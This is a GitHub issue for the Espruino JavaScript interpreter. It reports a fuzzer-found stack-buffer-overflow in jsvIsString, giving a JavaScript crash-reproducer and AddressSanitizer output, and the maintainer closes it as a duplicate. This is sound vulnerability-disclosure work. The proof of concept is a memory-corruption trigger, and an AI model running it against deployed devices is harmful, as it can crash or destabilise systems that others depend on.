espruino/Espruino #2143: stack-buffer-overflow jsvar.c:91:52 in jsvIsString

Q1IQ, 2022-02-08:
### Environment

```
OS      : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit  : a8c74cbe557924dec90cc0da4f7a6a180a1a47d6 
Version : 2v11
Build   : CFLAGS += -fsanitize=address -fno-omit-frame-pointer 
```

### Proof of concept

```
function main() {
var a0 = 0xdeadbeef;
var a1 = 0xdeadbeef;
var a3 = [1111111.2222222222,1111111.2222222222,1111111.2222222222];
var a4 = 0xdeadbeef;
var a7 = 0xdeadbeef;
var a10 = 0xdeadbeef;
var a11 = 0xdeadbeef;
var a12 = 0xdeadbeef;
var a13 = 0xdeadbeef;
var a14 = 0xdeadbeef;
var a15 = 0xdeadbeef;
var a16 = 0xdeadbeef;
var a17 = 0xdeadbeef;
var a18 = 0xdeadbeef;
var a21 = 0xdeadbeef;
function a22(a23,a24) {
    var a25 = 0xdeadbeef;
    var a27 = 0xdeadbeef;
    var a30 = [1111111.2222222222,1111111.2222222222,Infinity,1111111.2222222222,1111111.2222222222];
    var a31 = a30.join();
    var a33 = [512,512,512,512,512];
    var a34 = 0xdeadbeef;
    var a36 = 0xdeadbeef;
    var a37 = 0xdeadbeef;
    var a38 = 0xdeadbeef;
    var a39 = 0xdeadbeef;
    var a41 = 0xdeadbeef;
    var a43 = 0xdeadbeef;
    var a44 = 0xdeadbeef;
    var a45 = 0xdeadbeef;
    var a46 = 0xdeadbeef;
    var a47 = 0xdeadbeef;
    var a48 = delete a31.constructor;
    var a49 = 0xdeadbeef;
    var a50 = 0xdeadbeef;
    var a57 = 0xdeadbeef;
    var a55 = 0xdeadbeef;
    var a53 = 0xdeadbeef;
    var a70 = 0xdeadbeef;
    var a51 = [512,512,512,512,512];
    var a52 = [512,512,512,512,512];
    var a54 =[512,512,512,512,512];
    var a56 = /U\d/;
    var a59 = [512,512,512,512,512];
    Array[0xdeadbeef] <<= 0xdeadbeef;
    for (var a62 in a56) {
        var a64 = [1111111.2222222222,1111111.2222222222,1111111.2222222222,1111111.2222222222,1111111.2222222222];
        var a65 = delete a64.__proto__;
        a64.valueOf = 255;
        var a69 = TypeError(0xdeadbeef);
        var a71 = [a69];
        var a73 = JSON.stringify(a71);
        var a74 = JSON.parse(a73);
    }
    var a77 = 1111111.2222222222 in a59;
    a52.__proto__ = a56;
}
[... 87 lines cut ...]
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3722642==ABORTING

```

### Credit

Q1IQ(@Q1IQ)

gfwilliams, 2022-02-08:
Hi - please can you avoid posting other bugs until I fixed your last one? I think these two are likely related

gfwilliams, 2022-02-08:
Yep, definitely dup of #2143

closed 2022-02-08 by gfwilliams